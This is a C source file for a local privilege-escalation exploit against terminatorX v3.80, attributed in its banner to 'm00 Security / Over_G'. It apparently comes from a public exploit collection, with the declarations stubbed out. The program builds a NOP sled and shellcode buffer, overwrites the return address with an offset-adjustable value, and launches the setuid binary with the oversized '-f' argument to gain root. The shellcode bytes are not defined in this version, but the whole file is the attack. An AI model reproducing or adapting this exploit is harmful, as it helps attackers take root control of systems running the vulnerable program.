
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int atoi (char*) ;
 int execl (char*,char*,char*,char*,int *) ;
 int memcpy (char*,char*,int) ;
 int printf (char*,...) ;
 int ret ;
 char* shellcode ;
 int strlen (char*) ;

int main(int argc, char ** argv)
{
int i,offset;
char buffer[1266];

  if(argv[1]) { offset=atoi(argv[1]);
   ret = ret - offset; }

for (i=0; i < (259-strlen(shellcode));i++) buffer[i]=0x90;
memcpy((buffer+259-strlen(shellcode)),shellcode,strlen(shellcode));
memcpy((buffer+259),"A",1);
memcpy((buffer+260), (char*)&ret, 4);



printf("\nterminatorX v3.80 - local root exploit by m00 Security / Over_G\n    	  www.m00.ru		OverG[at]mail.ru\n\n");
printf("Using ret: 0x%08x \n",ret);

execl("/usr/local/bin/terminatorX","terminatorX","-f",buffer,((void*)0));

}
